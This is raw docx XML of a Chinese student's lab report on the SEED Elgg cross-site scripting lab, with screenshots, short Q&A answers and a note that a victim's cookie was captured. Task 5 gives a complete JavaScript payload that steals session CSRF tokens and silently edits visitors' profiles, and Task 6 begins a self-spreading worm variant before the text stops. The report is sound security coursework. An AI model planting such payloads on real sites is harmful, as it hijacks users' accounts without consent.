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4B7AF" w14:textId="71464FD3" w:rsidR="00656714" w:rsidRDefault="00656714" w:rsidP="00990AE7">
      <w:r w:rsidRPr="00656714">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统实验五实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31713AB4" w14:textId="0C14C929" w:rsidR="00656714" w:rsidRDefault="00656714" w:rsidP="00990AE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">7119123 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高昂</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3711F247" w14:textId="326C8D47" w:rsidR="00990AE7" w:rsidRDefault="00990AE7" w:rsidP="00990AE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46886F6D" w14:textId="4C076ABC" w:rsidR="00990AE7" w:rsidRDefault="00990AE7" w:rsidP="00990AE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>seed-server.com 并</w:t>
      </w:r>
      <w:r w:rsidR="00DA7A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:t>samy 输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:t>消息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013D79A7" w14:textId="5A0C6F50" w:rsidR="0070345A" w:rsidRDefault="0070345A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395EECA0" w14:textId="577A3C81" w:rsidR="003C44FD" w:rsidRPr="00DA7A7D" w:rsidRDefault="004C1072">
      <w:r w:rsidRPr="004C1072">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5652E10B" wp14:editId="231EE4D1">
            <wp:extent cx="5274310" cy="1969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A7D" w:rsidRPr="00DA7A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他账户</w:t>
      </w:r>
      <w:r w:rsidR="00DA7A7D" w:rsidRPr="00DA7A7D">
        <w:t>访问 samy 的主页</w:t>
      </w:r>
      <w:r w:rsidR="00DA7A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247BDE21" w14:textId="7E9D5224" w:rsidR="004C1072" w:rsidRDefault="004C1072">
      <w:r w:rsidRPr="004C1072">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08BA5DF6" wp14:editId="76A18A99">
            <wp:extent cx="5274310" cy="2883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A7D" w:rsidRPr="00DA7A7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA7A7D" w:rsidRPr="00DA7A7D">
        <w:t>Task 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6652ABAA" w14:textId="6BAB2D47" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>seed-server.com 并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:t>samy 输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:t>消息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74651E92" w14:textId="1CDB6A14" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:r w:rsidRPr="004C1072">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B97A12" wp14:editId="0301FBE8">
            <wp:extent cx="5274310" cy="14465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466D" w14:textId="076C1149" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>访问 samy 的主页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4E39A4" w14:textId="733CE3D0" w:rsidR="004C1072" w:rsidRDefault="004C1072">
      <w:r w:rsidRPr="004C1072">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51F9F876" wp14:editId="51C06E1B">
            <wp:extent cx="5274310" cy="2978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A41E" w14:textId="70337C81" w:rsidR="004C1072" w:rsidRDefault="00DA7A7D">
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>Task 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E42585E" w14:textId="66A5987A" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>seed-server.com 并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:t>samy 输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:t>消息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46DC50" w14:textId="1250D95E" w:rsidR="004C1072" w:rsidRDefault="00DA7A7D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1DDC363A" wp14:editId="24191A9A">
            <wp:extent cx="3746500" cy="51816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4508" t="82178" r="26661" b="-132"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="37465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019F1" w14:textId="77777777" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>访问 samy 的主页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF99E7" w14:textId="77777777" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261E2F7D" w14:textId="45A097F3" w:rsidR="004C1072" w:rsidRDefault="004C1072">
      <w:r w:rsidRPr="004C1072">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D2A40E2" wp14:editId="0F12F5E9">
            <wp:extent cx="5274310" cy="1684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F14" w14:textId="709A3B0A" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>Samy 获得了 Alice 的 cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7D49C" w14:textId="501B6B34" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>Task 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC951D" w14:textId="02891E97" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boby</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t xml:space="preserve"> samy 为好友的 get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53DBB8" w14:textId="79D75CC7" w:rsidR="00C93EF4" w:rsidRDefault="00C93EF4">
      <w:r w:rsidRPr="00C93EF4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ADA61C9" wp14:editId="7CE9EA7F">
            <wp:extent cx="5274310" cy="1257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440A" w14:textId="250EDD5F" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>seed-server.com 并登</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路</w:t>
      </w:r>
      <w:r>
        <w:t>samy 输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:t>消息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1034943A" w14:textId="6A15FEE3" w:rsidR="00943AB5" w:rsidRDefault="00DA7A7D">
      <w:r w:rsidRPr="00943AB5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55CF1448" wp14:editId="7D542D12">
            <wp:extent cx="5274310" cy="2058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20FB" w14:textId="77777777" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>访问 samy 的主页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E04306" w14:textId="77777777" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF01117" w14:textId="4A8841AA" w:rsidR="00943AB5" w:rsidRDefault="00943AB5">
      <w:r w:rsidRPr="00943AB5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770816E8" wp14:editId="6C4FC011">
            <wp:extent cx="5274310" cy="2045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E967" w14:textId="024303A6" w:rsidR="00943AB5" w:rsidRDefault="00943AB5">
      <w:r w:rsidRPr="00943AB5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56DC7464" wp14:editId="7B3309E2">
            <wp:extent cx="5274310" cy="1675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059D" w14:textId="31DAFB9E" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r>
        <w:t>Q1：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t xml:space="preserve">Explain the purpose of Lines </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>➀</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>➁</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>, why are they are needed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF64EF1" w14:textId="77777777" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取被攻击者的浏览器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">__elgg_ts 和__elgg_token 值，用于取得服务器验证。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CB29FE" w14:textId="77777777" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r>
        <w:t>Q2：: If the Elgg application only provide the Editor mode for the "About Me" field, i.e.,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CC937A" w14:textId="0DCFF1E2" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r>
        <w:t>you cannot switch to the Text mode, can you still launch a successful attack?</w:t>
      </w:r>
      <w:r>
        <w:cr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过查看页面源码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站对我们的输入的处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后根据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFB57E" w14:textId="13A58D5D" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站处理对输入代码调整。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512CDCC9" w14:textId="51E816D4" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>Task 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC0A46C" w14:textId="0F835C8C" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取用户修改个人资料的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t xml:space="preserve"> post 报文：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792C9528" w14:textId="700E8966" w:rsidR="0005430D" w:rsidRDefault="0005430D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0005430D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B9FD3F" wp14:editId="32DDF1B6">
            <wp:extent cx="5274310" cy="2052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CE3" w14:textId="3D822EDE" w:rsidR="00943AB5" w:rsidRDefault="00943AB5">
      <w:r w:rsidRPr="00943AB5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F23256" wp14:editId="6892277D">
            <wp:extent cx="5274310" cy="4119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37B" w14:textId="63304885" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改samy的about</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>me信息，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t xml:space="preserve"> Edit HTML 模式下输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2683764B" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>&lt;script type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5DDAF0" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>window.onload = function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A4EBCC" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>var userName="&amp;name="+elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6DD4E" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>var guid="&amp;guid="+elgg.session.user.guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594DE43" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>var ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FA3F4" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>var token="&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E1ABE6" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>var content=token+ts+"name="+userName+"&amp;description=&amp;accesslevel[description]=2&amp;briefdescription=Samy is my hero&amp;accesslevel[briefdescription]=2&amp;location=&amp;accesslevel[location]=2&amp;interests=&amp;accesslevel[interests]=2&amp;skills=&amp;accesslevel[skills]=2&amp;contactemail=&amp;accesslevel[contactemail]=</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2&amp;phone=&amp;accesslevel[phone]=2&amp;mobile=&amp;accesslevel[mobile]=2&amp;website=&amp;accesslevel[website]=2&amp;twitter=&amp;accesslevel[twitter]=2"+guid; ; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C4B61" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t xml:space="preserve">var samyGuid=59; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C34A43F" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t xml:space="preserve">var sendurl="http://www.seed-server.com/action/profile/edit"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8E0730" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t xml:space="preserve">if(elgg.session.user.guid!=samyGuid) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B6917A" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F7FBBD" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>var Ajax=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F817CC4" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>Ajax=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C55D4" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>Ajax.open("POST", sendurl, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79956BC5" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>Ajax.setRequestHeader("Content-Type",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745468E3" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>"application/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548C446" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>Ajax.send(content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E9C5A" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E10A40" w14:textId="77777777" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C572C38" w14:textId="0F15813B" w:rsidR="0005430D" w:rsidRDefault="0005430D" w:rsidP="0005430D">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B80C9" w14:textId="1F587C62" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="0005430D"/>
    <w:p w14:paraId="20A87B85" w14:textId="77777777" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="0005430D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7C9278" w14:textId="7A974E77" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="0005430D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>访问 samy 的主页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AA86ED" w14:textId="27569127" w:rsidR="00455DEE" w:rsidRDefault="0005430D">
      <w:r w:rsidRPr="0005430D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D75215" wp14:editId="6291DA0A">
            <wp:extent cx="5274310" cy="4137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612E" w14:textId="77777777" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r>
        <w:t xml:space="preserve">Q3： Why do we need Line </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>➀</w:t>
      </w:r>
      <w:r>
        <w:t>? Remove this line, and repeat your attack. Report and explain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C74A1C" w14:textId="68B61B2B" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:r>
        <w:t xml:space="preserve">your observation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0B46E1" w14:textId="1E33CC49" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D" w:rsidP="00DA7A7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当访问用户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> guid 是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己</w:t>
      </w:r>
      <w:r>
        <w:t>时不进行攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止攻击自己</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278A2FA8" w14:textId="6602D943" w:rsidR="00455DEE" w:rsidRDefault="00DA7A7D">
      <w:r w:rsidRPr="00DA7A7D">
        <w:t>TASK 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1655D7FA" w14:textId="7465446E" w:rsidR="00DA7A7D" w:rsidRDefault="00DA7A7D">
      <w:r w:rsidRPr="00DA7A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>worm代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加入我们在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A7D">
        <w:t xml:space="preserve"> task5 中写的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7AEF2A" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;script id="worm" type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36001D" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>window.onload = function(){</w:t>
      </w:r>
